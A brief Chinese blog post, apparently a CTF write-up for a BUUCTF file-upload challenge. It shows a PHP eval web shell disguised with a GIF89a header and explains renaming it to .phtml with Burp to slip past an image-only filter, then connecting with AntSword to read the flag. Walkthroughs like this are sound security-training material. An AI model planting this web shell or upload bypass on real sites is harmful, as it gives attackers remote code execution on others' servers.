乐呵呵、欢的博客

lehhair's Blog

buuctf-upload1

155
2023-04-25

[ACTF2020 新生赛]Upload 1

  1. 打开靶机 enter image description here

  2. 根据提示发现只能上传图片文件 enter image description here

  3. 修改文件名之后发现上传依旧不可行,尝试伪造文件头

    GIF89a
    <script language='php'>@eval($_POST['root']);</script>
    
  4. 上传成功,这次使用bp抓包,修改文件名为phtml可执行文件 enter image description here

  5. 访问文件路径 enter image description here

  6. 使用蚂剑连接,直接跳到根目录,发现flag

    enter image description here enter image description here enter image description here